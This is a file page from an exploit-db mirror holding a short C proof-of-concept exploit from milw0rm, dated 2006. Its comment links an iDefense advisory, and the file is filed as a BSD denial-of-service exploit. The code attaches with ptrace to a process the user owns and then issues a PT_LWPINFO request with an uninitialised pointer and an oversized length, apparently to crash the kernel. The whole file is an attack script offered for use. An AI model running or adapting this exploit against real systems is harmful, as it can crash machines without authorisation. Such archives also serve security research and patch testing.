exploit-db-mirror/exploits/bsd/dos/2524.c
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
444 B
C

#include <sys/types.h>
#include <sys/ptrace.h>
#include <unistd.h>
/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
thank you oh unknown, sincerely kokanin@gmail. usage: ./blah <pid you own> */
int main(int argc, char *argv[]){
struct ptrace_lwpinfo *lol;
ptrace(PT_ATTACH,atoi(argv[1]),NULL,0);
wait(NULL);
ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768);
}
// milw0rm.com [2006-10-12]